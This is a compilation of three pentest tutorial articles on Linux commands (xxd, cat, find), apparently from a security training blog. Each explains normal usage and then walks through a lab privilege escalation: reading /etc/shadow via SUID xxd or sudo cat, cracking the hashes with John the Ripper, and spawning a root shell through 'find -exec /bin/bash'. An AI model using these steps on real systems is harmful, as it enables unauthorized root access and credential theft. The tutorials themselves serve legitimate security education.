Linux for Pentester: xxd Privilege Escalation

In this article we are going to make our readers familiar with another influential command i.e. “xxd” which assist for converting any hex dump to a binary and vice-versa. So, by knowing this certainty now we will check that how wisely we can make it applicable in Privilege Escalation.

Table of content

Introduction to xxd

·         Major Operation performed using xxd

Exploiting xxd

·         SUID Lab setups for privilege Escalation

·         Exploiting SUID

Introduction to xxd

As we know whenever we want to convert any format of a file into another format then, we can grab that simply by using online converter which helps to convert a file into desired format such as: “pdf to word, jpg to pdf, excel to pdf” etc. but what if someone desired to get any file into its hexadecimal form or binary??

So, in this article I’m emphasizing the way through which one can easily get hex dump or binary format for any file. This can be achieved by one of Linux command i.e. “xxd”. The xxd command enables the user to generate a hex dump of a given file and can also reverse a hex dump back to its original ASCII form.  This phenomenon can also help in the procedure of encoding and decoding any mysterious file.

First, we will check for its help/man command to identify how we can use xxd for this conversion.

xxd -h

By typing the above command, we can achieve a list of arguments that can be used with xxd for generating hex dump of a given file.

Major Operation performed using xxd

Converts file contents into hex: For instance, I’m creating a new file by the name of “secret.txt” and now I want to convert its whole content into hexadecimal form so, I will type the below mentioned command to execute the desired output.

Syntax: xxd filename

xxd secret.txt

By the below image it’s clear that xxd has generated the hex dump for the file “secret.txt”.

Here, we can observe the following hex dump are obtained its default format such as:

·         Indexing the number of lines. (eg: 00000000, 00000010, 00000020…………00000220)

·         Default number of octets per group is 2 (-e: 4 little-endian hexdump) which is groupsize of 4 bytes. (eg: 4967 6e69…………6e67)

·         The standard column length is equal to 16 bits with whitespace.  (eg: Ignite is Having)

Skip nth line with xxd: While converting a file there may be lots of data that may not be of our use so, instead of obtaining whole data we can skip those contents that are needless (skip the no. of lines). For this we can use xxd to skip nth line and produce hex value after skipped lines.

Suppose in our circumstance we want to generate hex dump from line 5 ahead then this can be attained by using “-s” argument followed by xxd command.

xxd -s 0x50 secret.txt

To limit output up to particular length: As above I have explained how one can retrieve data by skipping no. of lines i.e. output from a specific line but, if we need to limit the length of standard output then we will use “-l” argument instead of “-s”.

Here I’m limiting the length of my contents to print the data up to limited range i.e. 5^th line as shown in below screenshot.

xxd -l 0x50 secret.txt

Hence, we can observe the difference between both commands; the first command generates the hex value initialized from 6^th line and second command ended with 5^th line as per hex indexing, take reference from above screenshot.

Converts file contents into binary: In above all image we have noticed that file has been dumped into its “hex form” but whenever we wish to produce the “binary form” for any file then we will use “-b” option. On using this option, the result will switch to its bit dump (binary digit) by grouping the output data into its octet using “1 or 0” rather than hex dump. To attain the same as per below image type command:

xxd -b secret.txt

Set column length: As above I have described how we can skip and limits the output up to range. Now I will illustrate how we can set column length. By default, it used to be 12, 16 for any dumped file but now I will explain what else we can do.

For this I’m taking three occurrences:

Default: As we know the default column length is 16. This will print 16 characters including whitespace.

xxd -l 0x20 secret.txt

Set the column length up to 32: I have set end index to limit printing data range by using “-l” option now after doing so I will set column length up to “32” which can be achieved by using “-c” argument.

xxd -l 0x40 -c 32 secret.txt

From the given below screenshot we can easily realize how xxd has limits the column length.

Set the column length up to 9: As above, now I have set column length up to “9” by following the same process as discussed above.

xxd -l 0x40 -c 9 secret.txt

In all case xxd has created the hex dump for file by counting each character with whitespace.

Print Plain hex dump style: The postscript option “-ps” is used only in case when we required our output in plain hex dump style. Here we have saved its output inside hex file to obtain plain hexadecimal value of secret.txt file. To ensure the result we have used cat command to read output from hex file.

xxd -ps secret.txt > hex

cat hex

From below image it can be cleared that how xxd has created plain hex dump style for file “secret.txt” by restricting the plain text.

To revert any file: To return any generated output into its original form we can use “-r” option. In our case we have used “-r -p” to print the reverse output from plain hex dump style into its ASCII form.

xxd -r -p hex

Groupsize bytes: If we required to group the output into number of octets then we can use “-g” option for this purpose. By default, it is 2 (-e: 4 little-endian hex dump). So, if we set this value to 4 then it will be grouped into 8 bits.

In below screenshot we have set this value to 8 which will group into 16 bits as desired output to concise the result.

xxd -l 0x30 -g 8 secret.txt

SUID Lab Setups for Privilege Escalation

The SUID bit permission enables the user to perform any files as the ownership of existing file member. Now we are enabling SUID permission on xxd, so that a local user can take opportunity of xxd as root user.

Hence type following for enabling SUID bit:

which xxd

chmod u+s /usr/bin/xxd

ls -al /usr/bin/xxd

Exploiting SUID

Now we will start exploiting xxd service by taking privilege of SUID permission. For this I’m creating session of victim’s machine which will permit us to develop the local user access of the targeted system.

Now we need to connect with target machine with ssh, so type the command:

ssh test@192.168.1.103

As we know we have access of victim’s machine so we will use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

Here we came to recognize that SUID bit is permitted for so many binary files, but our concerned is:   /usr/bin/xxd.

Taking privilege of SUID permission on xxd we are going to grab the shadow’s file for extracting password hash file.

In the below image first, I have requested to expose the /etc/shadow file by the use of xxd which will produced the hex dump for the file along that I have piped the xxd command to revert its output.

xxd “/etc/shadow” | xxd -r

Now I have use john the ripper tool to crack the password hashes. By doing so we will get credential of user as shown in below image.

john hash

Once we get the user’s credential then we can switch user. Here first we check sudo rights for user: raj and noticed that user “raj” has ALL privileges.

su raj

sudo -l

sudo su

Therefore, we switch to root user account directly and access the root shell as shown in the image. Hence, we have successfully accomplished our task of using xxd command for Privilege Escalation.

Linux for Pentester: CAT Privilege Escalation

Today we are going to talk about CAT command and learn how helpful the apt command is for Linux penetration testing and how we’ll progress apt to scale the greater privilege shell.

Table of Content

·         Introduction to CAT

·         Major Functions of CAT command

·         Sudo rights Lab setups for Privilege Escalation

·         Exploiting Sudo Rights

Introduction to CAT

In Linux, Cat stands for "catenate," which is one of Unix-like operating system most frequently used commands. It reads file information and displays its content as an output. It enables us build, view and link files. So, we can not only see the content using CAT command; apart from this we can, copy the content of file to some other file and view the files with numbers and so on. Not only this we will do such things which is not only new but is what we might have not thought of. We will perform Privilege Escalation using CAT command. That’s sounds interesting. Isn’t it? So, let’s start-

Major Functions of CAT command

At first, we will run cat -h command which means help and which will tell you about all the options which are available in CAT command as we can see in the picture below.

cat - -help

Write and Read a file:

Our next step is to create a file using cat command. And for this we will use less than sign (>) after cat command to generate a new file. So, we have created a new file named notes.txt by using (>) this sign after cat command and write the content which you want to keep in the file as in our case I have written “Welcome to Hacking articles” in the file notes.txt

cat > notes.txt

Not only this we can also edit the content of the existing file without opening the file by using less than sign twice (>>) as you can see in the screenshot that we have added “Join Ignite Technologies”  in notes.txt

cat >> notes.txt

cat notes.txt

Now we can confirm this by reading the file once again.

cat notes.txt

Number all output lines:

Now let’s say if we want to view file contents preceding line numbers or in other words you want to view the output serialized. So first we will create a new text file named dict.txt in which we have written some content which is going to be easily readable number wise with -n command.

cat dict.txt

cat -n dict.txt

As result this add a serial number column for every line as shown below:

Overwriting a file:

Now we want to copy the content of file dict.txt into notes.txt or in other words we want to overwrite the file notes.txt. So in order to do, this first we write the file name from which the content is to be copied and then we will write the file name whose content we want to replace followed by less than sign(>) .

Syntax: cat [file1] > [file2]

cat dict.txt > notes.txt

As you can observe in the picture below that we have replaced the content of notes.txt with dict.txt

Concatenating files:

Now we want to merge two files together or in other words we want to combine two files. So, what will we do? Its again very simple; we will use less than sigh here but now twice (>>) and the content will be replaced successfully. So here we have another new file which is pass.txt and then we will proceed towards merging two files for which we will use (>>) sign again as we have done in the image below. Now again we will use -n to put this content number wise which we have done above.

cat > pass.txt

cat dict.txt >> pass.txt                

cat -n pass.txt

As result you can observe that we have concatenate dict.txt in the pass.txt file.

Reverse order:

As the name suggests and we can reverse all the content using tac command which is just a reverse of cat command and it works for this purpose only.

tac dict.txt

With the help of tac command, we try to reverse the file by making vertical flip as shown below.

Sudo rights Lab setups for Privilege Escalation

Now here our next step is to set up the lab of Sudo rights or in other words to provide Sudo privileges to a user for cat executable. Here we are going to add a user by the name of test in the suoders files and here we have given permission to user test to run cat command as root user.

Exploiting Sudo Rights

Now we will connect through ssh in kali and after that we will run sudo -l which is sudo list and through which we can see that user test has the permission to run cat as root user.

ssh test@192.168.1.108

Now our next step is to exploit sudo rights through cat command. So, we will run cat /etc/shadow command to see all the users and their respective passwords hashes.

sudo -l

sudo cat /etc/shadow

Wonderful! We have got all the user’s list and their passwords’ hash value.

Cracking the Hash Password

Now our next step is to crack the hash value so that we are going to use “John the Ripper” tool to crack this hash value in order to get the password in decrypted form. So first we have taken one user whose password we want to check. So, run the following command in the terminal-

john hash - -show

Great! We have cracked the password successfully. Now we will switch user raj to check if we can log in through that password and we can see that we have successfully logged in as raj user.

Now we will run sudo -l command to check if user raj, and found he has all the root permissions.

sudo -l

sudo su

Now, we will again try to switch to user root and we are logged in as root and then we run id command we get to know that we got root shell.

So, we have performed privilege escalation through cat command successfully.

Linux for Pentester: Find Privilege Escalation

Today in this article we are back with another most advantageous command from the series of Linux for Pentester i.e. “Find’. The Find command is used to search the list of files and directories, so by knowing this fact we will now illustrate that how we can avail it in Privilege Escalation.

Table of Content

Introduction to Find

·        Major Operation performed using Find

Exploiting Find

·        Sudo Rights Lab setups for privilege Escalation

·        Exploiting Sudo rights

·        SUID Lab setups for privilege Escalation

·        Exploiting SUID

Introduction to Find

 Find command is a command line facility for walk around a file pyramid structure to find the exact location of the file and directory as per user’s desire. This search command can be used by variability of services like search any file by “size, permissions, date of modifications/access, users, groups” and many more as per user requisite.

Alike every command the Find also can be concisely understand by its help/man command as per below image.

find --help

Major Operation performed using Find

·        Search any file by particular name in current directory: This command supports the user to search any file by specific name. Suppose we want to search a text file by the name of “raj” from current directory then simply compose the command as per below screenshot.

find . -name raj.txt

·        Search any file by particular name in home directory: If we wish to find all the files under home directory by desired file name, in our case it is “raj.txt” then form command as below:

find /home -name raj.txt

(It will permit the user to find all “raj.txt” file under home directory)

·        Find files by its extension: This can be returned by specifying the particular file extension. If any user wants to fetch any file by its extension, then it can be done by “-type f” option followed by Find command. As in our scenario we are fetching for .txt

One can also use “-type d” option instead of “-type f” for retrieving the directory.

find / -type f -name *.txt”

This command will support the user for printing all .txt file as desired output.  

·        Find files with full permission: Whenever anybody wish to explore for the files that have full permission i.e. “777”  then it can be simply acquired by “-perm 0777” followed by Find command with option “-type f” which will print the output for all the files that have“777” permission.

find . -type f -perm 0777 -print

·        To find all files for specific user of a directory: If we need to find all those files that belongs to a particular user under any selective directory then that we can execute this by command as:

find /tmp -user raj

In our instance we are finding for all those files that belongs to user “raj” under “tmp directory”.

·        

To find all hidden files: If we want to find all hidden files within any directory then we will type command as below:

find /tmp -type f -name “.*”

This command will give a consequence for all hidden files in current directory.

·        To find all readable files within a directory:  To find all readable files from a specific directory. In the below screenshot we are discovering for all those file that are in readable form under /etc directory

find /etc/ -readable -type f 2>/dev/null 

By typing above command, we will get all readable files that comes under /etc as output.

Find SUID files: Whenever any command runs, at which SUID bit is set then its effective UID becomes the owner of that file. So, if we want to find all those files that holds the SUID bit then it can be retrieve by typing the command:

find / -perm -u=s -type f 2>/dev/null

Find SGID files: The SGID permission is similar as SUID but the only difference is that, whenever any command runs at which SGID permission is set, then the process will have the same group ownership as the owner of file. So, to run all those files that possess SGID bit, type command:

find / -perm -g=s -type f 2>/dev/null

To find SUID & SGID files simultaneously: If we want to fetch all those files simultaneously at which both bits i.e. “SUID & SGID” are set then frame command as:

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

To find all writable file: To find any writable directories within any desired directory such as: /home, /tmp, /root, then we will run command as:

find /home -writable -type d 2>/dev/null

As per below image we have find all writable directories from /home.

Exploiting Find

Sudo Rights Lab setups for privilege Escalation

Now we will set up our lab of Find command by granting it higher privilege i.e. with administrative rights. As we know performance of every command gets changed after the influence of higher privileges. Same we will check for our Find command and will grasp what effect it would have after accomplishment of sudo rights and how we can custom it more in privilege escalation.

To recognize it more visibly first we will create a local user (test) who retain all sudo rights as root.

To add sudo right open /etc/sudoers file and frame below command as user Privilege specification.

test        ALL=(root) NOPASSWD: /usr/bin/find

Exploiting Sudo rights

Now we will start exploiting Find service by taking privilege of sudoer’s permission. For this we must have session of victim’s machine which will enable us to devise the local user access of the targeted system which will support us further to escalate the root user’s rights.

 For this we need to connect with target machine with ssh, so type the command as shown below for performing the same.

ssh test@192.168.1.22

Then we checked for sudo right of “test” user (if given) and found that user “test” can execute Find command as “root” without password.

sudo -l

Find command let you perform some specific action such as “print, delete and exec”. So here we are taking privilege of “exec” for executing the command to access root shell by running /bin/bash with the help of find command as given bellow:

sudo find /home -exec /bin/bash \:

On running above command, we have successfully escalated the root shell as shown in the below image.

SUID Lab setups for privilege Escalation

As we know the SUID bit permission enables the user to execute any files as the ownership of existing file member. Now we are enabling SUID permission on Find, so that a local user can take opportunity of Find as root user.

Hence type following for enabling SUID bit:

which find

chmod u+s /usr/bin/find

ls -al /usr/bin/find

Exploiting SUID

As we know we have access of victim’s machine so we will use Find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

So here we came to recognize that SUID bit is empowered for so many binary files, but our concerned is:   /usr/bin/find.

As we know Find command supports the user to perform some specific action such as print, delete and exec. So here again we are taking privilege of “exec” for executing another command i.e. “whoami”

find raj -exec “whoami” \:

Similarly, you can take honor of Find command for escalating the root privileges.